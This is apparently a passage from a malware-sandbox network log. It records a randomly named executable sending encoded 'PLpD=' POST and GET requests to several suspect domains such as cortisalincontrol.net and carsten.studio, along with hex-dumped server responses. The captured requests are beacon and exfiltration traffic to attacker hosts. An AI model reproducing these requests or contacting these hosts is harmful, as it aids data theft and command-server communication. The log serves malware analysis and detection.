                                                                                Data Raw: 50 4c 70 44 3d 50 2f 34 4d 45 53 37 2b 73 6d 57 6f 32 66 79 47 44 54 6c 36 7a 43 59 6e 75 67 59 61 53 42 39 63 4f 44 78 4b 63 6f 48 47 2f 2f 62 46 54 42 77 6c 38 72 77 78 65 37 6c 64 61 4c 46 74 44 31 68 6b 75 79 73 32 79 34 77 4e 78 74 46 41 56 67 48 74 78 35 30 6b 7a 48 4b 51 5a 78 61 30 67 62 30 2f 71 54 2f 65 38 61 6a 75 2b 64 61 58 38 52 43 57 66 4a 55 4a 65 79 4c 6e 68 61 70 54 36 36 53 53 38 53 37 79 7a 50 73 39 43 66 2f 45 5a 65 5a 76 47 33 49 30 7a 73 33 33 39 49 6b 53 73 52 41 35 67 66 75 4a 53 45 4c 4a 4f 59 50 32 79 53 46 6e 63 2f 30 53 59 30 6b 48 6d 2b 35 32 64 33 61 6e 78 6d 68 45 41 43 39 4a 2f 54 72 69 6e 59 45 53 79 41 46 46 2f 79 6e 66 58 76 39 61 64 63 2f 33 50 38 6f 35 6d 4a 48 4a 6f 59 51 51 36 78 63 4c 6e 36 66 77 54 47 59 50 4c 35 43 6e 54 62 51 37 44 39 41 4f 31 6e 58 74 54 38 2f 53 6d 38 34 38 2f 39 4b 42 73 75 39 6a 4f 74 59 41 30 64 43 6c 49 71 2f 4e 59 79 64 66 61 6a 51 38 69 30 76 46 2b 72 61 30 34 6f 6f 64 61 2f 6e 43 6e 52 69 46 2f 38 39 74 79 63 70 34 39 7a 36 69 46 [TRUNCATED]
                                                                                Data Ascii: PLpD=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//bFTBwl8rwxe7ldaLFtD1hkuys2y4wNxtFAVgHtx50kzHKQZxa0gb0/qT/e8aju+daX8RCWfJUJeyLnhapT66SS8S7yzPs9Cf/EZeZvG3I0zs339IkSsRA5gfuJSELJOYP2ySFnc/0SY0kHm+52d3anxmhEAC9J/TrinYESyAFF/ynfXv9adc/3P8o5mJHJoYQQ6xcLn6fwTGYPL5CnTbQ7D9AO1nXtT8/Sm848/9KBsu9jOtYA0dClIq/NYydfajQ8i0vF+ra04ooda/nCnRiF/89tycp49z6iFOuwkJyOhfpoGRlCouV1Dkc+RI1zvwqkjmpH9c55kr3RoRceoMsRR3LTJJqxv+lXvYlt0q2P3+A5aC7uyulAC0SMPF/ZN4Vzf9hNW1tNYrdv+4FItlspCIC85ke+rhqCmSkHgCTlHLvJFs+px/G71HYWzrMxcVbBgGRf7lvAgp4bgtev4XZLZ9EANhFSnlPe3WIPN+5Uu0W5knkYpkS6uwxzPqwamxAVpFD9uFtjDh8m4fMGzvDH/RV/c3juOK8r4yrCtcUcw6Ekx5+OE3waPg9dmLbyEBniWjK8/M9jCYOkHBg3i/s7h+DnB+ByQ/A2+DIFRg9lbW8LSBM6g3K/P6JeS/ojcxbT7aeR2XMgR+lyucIaN001QkVWxMdmvzIuwo0Aog1KraG0NsveM4ghAD1QFIKPFYYTbDBYyOL4fArK2vH0w/CHt/xFOxMMKC58zH1PJ6rfK2Go2KLmo3V9H8+Eh000zO4gqcRnYfkd+TLjJGan9AzdYv2fZYiVmD9HkrGNE468C0Gfnt68EL/GAyw2H/EkDFySNUUimfcWKMwoHL2EJt+X9NAJB2gZNSrGlkfJvw08KRzfE3alP1uK1gDEmxTygwFI6cz+3Gj86Gc+fDxO1hZBtm1BJS3wiaspjY9dhHw4G3hsSFkTFJlHP6vLq8BqXeDGn1J [TRUNCATED]
                                                                                Dec 3, 2024 14:16:24.990312099 CET1033INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:24 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.550017155.94.253.4803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:26.344985008 CET526OUTGET /fsgl/?PLpD=C9QsHkK47GSD7r6TBBJA1A1gthYOFQJYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9FpRWGdFmoqY0sqDryt//frta9xBWKUdk1ZjTnobcgzZTMuw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:27.647408009 CET1033INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:27 GMT
                                                                                server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.550018208.91.197.27803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:33.368778944 CET802OUTPOST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 6c 77 6c 79 68 66 30 53 30 31 38 49 6c 35 77 64 4f 6f 6b 77 48 57 64 5a 39 46 2f 49 77 4e 6e 32 6a 51 6f 44 71 41 34 65 46 55 36 36 6b 71 33 6f 70 39 6e 79 4e 79 72 35 7a 38 33 63 39 4f 49 45 63 52 69 66 33 43 45 37 66 48 50 66 54 64 76 43 6e 2b 6c 62 51 59 74 48 75 6a 72 48 66 33 4a 54 31 55 56 51 73 66 39 56 57 6b 42 74 6a 30 77 33 39 4b 6b 57 51 30 37 56 5a 45 33 32 6e 49 37 62 6a 5a 73 41 70 45 30 56 66 77 79 75 42 53 78 74 6c 46 62 37 64 36 73 38 6f 42 55 77 51 54 64 33 33 41 47 42 4b 73 47 51 56 45 68 49 42 61 4f 57 45 70 78 51 48 38 42 58 52 2b 45 3d
                                                                                Data Ascii: PLpD=9mZWOizSlj6vlwlyhf0S018Il5wdOokwHWdZ9F/IwNn2jQoDqA4eFU66kq3op9nyNyr5z83c9OIEcRif3CE7fHPfTdvCn+lbQYtHujrHf3JT1UVQsf9VWkBtj0w39KkWQ07VZE32nI7bjZsApE0VfwyuBSxtlFb7d6s8oBUwQTd33AGBKsGQVEhIBaOWEpxQH8BXR+E=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.550019208.91.197.27803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:36.103821993 CET822OUTPOST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 30 67 56 79 6e 38 63 53 38 31 38 50 70 5a 77 64 41 49 6b 38 48 57 52 5a 39 42 48 68 78 37 2f 32 6a 31 55 44 70 42 34 65 41 55 36 36 33 71 32 69 6b 64 6e 35 4e 79 57 47 7a 35 58 63 39 4f 63 45 63 54 4b 66 72 6a 45 30 64 58 50 64 4e 39 76 41 70 65 6c 62 51 59 74 48 75 6a 57 51 66 78 68 54 30 6e 39 51 76 36 4a 53 51 55 42 75 79 30 77 33 73 36 6b 53 51 30 36 47 5a 46 61 74 6e 4b 7a 62 6a 63 41 41 71 56 30 55 47 41 79 6f 46 53 78 38 31 48 61 69 62 70 4d 46 30 48 64 34 54 51 46 4d 37 57 33 72 51 4f 4f 34 47 6b 4e 77 52 4a 47 68 56 5a 51 35 64 66 52 6e 50 70 54 59 47 4b 43 31 38 59 75 39 59 4e 50 55 47 61 41 36 76 41 32 39
                                                                                Data Ascii: PLpD=9mZWOizSlj6v0gVyn8cS818PpZwdAIk8HWRZ9BHhx7/2j1UDpB4eAU663q2ikdn5NyWGz5Xc9OcEcTKfrjE0dXPdN9vApelbQYtHujWQfxhT0n9Qv6JSQUBuy0w3s6kSQ06GZFatnKzbjcAAqV0UGAyoFSx81HaibpMF0Hd4TQFM7W3rQOO4GkNwRJGhVZQ5dfRnPpTYGKC18Yu9YNPUGaA6vA29


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.550020208.91.197.27803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:38.802494049 CET1839OUTPOST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 39 6d 5a 57 4f 69 7a 53 6c 6a 36 76 30 67 56 79 6e 38 63 53 38 31 38 50 70 5a 77 64 41 49 6b 38 48 57 52 5a 39 42 48 68 78 37 33 32 6a 6a 67 44 72 69 41 65 44 55 36 36 73 4b 32 6a 6b 64 6e 6b 4e 32 43 43 7a 35 54 69 39 4d 6b 45 63 79 71 66 37 51 63 30 48 48 50 64 58 64 76 46 6e 2b 6c 4f 51 59 39 63 75 6a 6d 51 66 78 68 54 30 69 35 51 37 2f 39 53 4c 55 42 74 6a 30 77 46 39 4b 6b 71 51 30 43 57 5a 46 65 39 6e 2b 2f 62 67 38 51 41 6c 48 63 55 5a 77 79 71 41 53 77 68 31 48 57 48 62 70 52 38 30 48 42 53 54 51 39 4d 2f 67 6d 72 4d 71 57 30 52 46 5a 32 57 70 6e 4e 41 64 63 2b 51 66 68 4e 44 71 44 6c 44 34 65 6b 38 4f 61 50 56 75 7a 63 48 62 49 4a 75 48 66 49 37 5a 4a 6a 68 7a 34 62 32 50 49 32 58 6c 38 6e 77 54 74 7a 4b 74 56 31 77 76 69 42 45 4c 56 68 53 69 48 6c 7a 41 67 76 36 62 39 79 74 2f 65 76 35 63 69 6a 4d 47 6b 7a 59 33 44 34 34 56 4e 67 4e 72 74 31 6e 53 68 72 69 6a 4f 4b 7a 7a 35 42 32 55 6b 53 5a 73 6a 77 59 74 77 55 57 46 33 62 44 39 33 2f 61 58 36 6a 39 54 2b 34 30 31 70 46 6a [TRUNCATED]
                                                                                Data Ascii: PLpD=9mZWOizSlj6v0gVyn8cS818PpZwdAIk8HWRZ9BHhx732jjgDriAeDU66sK2jkdnkN2CCz5Ti9MkEcyqf7Qc0HHPdXdvFn+lOQY9cujmQfxhT0i5Q7/9SLUBtj0wF9KkqQ0CWZFe9n+/bg8QAlHcUZwyqASwh1HWHbpR80HBSTQ9M/gmrMqW0RFZ2WpnNAdc+QfhNDqDlD4ek8OaPVuzcHbIJuHfI7ZJjhz4b2PI2Xl8nwTtzKtV1wviBELVhSiHlzAgv6b9yt/ev5cijMGkzY3D44VNgNrt1nShrijOKzz5B2UkSZsjwYtwUWF3bD93/aX6j9T+401pFjOG2uOPJnf+A7MMNbFm15gZzRNF2hD8QwNWWuGtB/BB0vYb7Zi3zgjKe4ou9qeD0j9wLEB11Jlqa2bEBv36KOMC7sT9GWBRnJqbYAU2XC56ygHl/epdKiV5SoC4udbUYtP1Mflp3a2VC3BKSI2HINektSveDnJKryNdAxatjgeLzQtNg07jGTwjwlM3iky5oh0ihrs4bcWsIsg2w+SgndKRtXZ5VYEK9zLMAvsitNZbxUigcr5yHfWYLr5gsSUFWDG6LPdPjdL+6ymsZnXIBpGvuHyL6u9l8EKb6RGW86xPq70p38cFc5AU+0gwQQrNoPddiPjd4RH5Vh7380DMq5w/EnKLp0IPtQlXNOSrK00vxlPUqYhjkq1U4H6arZgOMwH4vPIXGZzo3+q+Birkm2IDMmxNpoNM3UFePYaIco4YmFxQd2ot4Gg9/HTxWdMnBvoldxoINh5T64LjiOa3Sq94+i3cDYCCSlh7qbhX1SxvRf8br/sGD10N90ki+JY8Em7SDHEiSSQSbq6HbIhdGTilPT5hs5EqGk9ZBAXIWM3mGxDC5NM3dtBns8DGfy/n9DglFav1td310JdSNbtuwfdlySLpfih5f4VlX/RL2XgQMomD/aV1uhjLVbVn/7AAHfltfMYI4oxvsdbGOCf7esFzT2wFNt8tCMz6 [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.550021208.91.197.27803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:41.483920097 CET529OUTGET /cbfz/?PLpD=wkx2NXiTkimKkWVEm8IW4C4huKMmJZN5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXdTvTMZn4meFjRqcHxGrlREZ38HV0x/J+b0VjoEphiZZaRg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:43.000658035 CET1236INHTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:16:42 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=912vr480777402653404593; expires=Sun, 02-Dec-2029 13:16:42 GMT; Max-Age=157680000; path=/; domain=www.cortisalincontrol.net; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAlpwvI6Iu379tXCzGJKconj+qZvNsg5UyDOBFjCBrVVVVL02szAVhpJqQKLGQ1A5iYIwTS2QEZFzexAvquzdA==
                                                                                Content-Length: 2645
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 69 41 6c 70 77 76 49 36 49 75 33 37 39 74 58 43 7a 47 4a 4b 63 6f 6e 6a 2b 71 5a 76 4e 73 67 35 55 79 44 4f 42 46 6a 43 42 72 56 56 56 56 4c 30 32 73 7a 41 56 68 70 4a 71 51 4b 4c 47 51 31 41 35 69 59 49 77 54 53
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAlpwvI6Iu379tXCzGJKconj+qZvNsg5UyDOBFjCBrVVVVL02szAVhpJqQKLGQ1A5iYIwTS
                                                                                Dec 3, 2024 14:16:43.000711918 CET1236INData Raw: 32 51 45 5a 46 7a 65 78 41 76 71 75 7a 64 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
                                                                                Data Ascii: 2QEZFzexAvquzdA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.cortisalincontrol.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.cortisalincontrol.net/px.js?c
                                                                                Dec 3, 2024 14:16:43.000720978 CET1169INData Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c
                                                                                Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.550022217.160.0.200803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:48.483681917 CET781OUTPOST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 34 50 6a 49 6d 56 34 75 76 64 30 4a 76 32 6f 47 62 74 33 63 76 67 59 4f 71 51 63 31 49 74 2f 6b 32 42 54 67 46 65 7a 58 53 32 39 73 4d 6f 45 73 6c 57 70 4d 6c 6f 6a 59 72 66 59 36 4a 7a 67 4d 63 37 52 51 67 68 44 76 34 74 2b 39 7a 75 42 77 33 52 6b 41 57 39 6e 61 69 6a 4a 4f 74 75 4c 61 4f 59 70 41 71 45 33 72 71 74 34 55 54 74 4b 62 64 63 54 55 58 7a 30 39 54 7a 37 6f 35 6d 67 71 2f 72 74 32 34 31 72 72 70 51 44 58 2f 74 43 57 6d 7a 6d 75 73 6d 4c 62 41 66 4d 53 49 77 2f 4c 79 55 69 48 32 6b 56 79 51 70 4a 49 44 73 42 77 67 41 4a 33 41 44 6d 69 72 56 73 3d
                                                                                Data Ascii: PLpD=JSsa8pF617NI4PjImV4uvd0Jv2oGbt3cvgYOqQc1It/k2BTgFezXS29sMoEslWpMlojYrfY6JzgMc7RQghDv4t+9zuBw3RkAW9naijJOtuLaOYpAqE3rqt4UTtKbdcTUXz09Tz7o5mgq/rt241rrpQDX/tCWmzmusmLbAfMSIw/LyUiH2kVyQpJIDsBwgAJ3ADmirVs=
                                                                                Dec 3, 2024 14:16:49.806359053 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:49 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
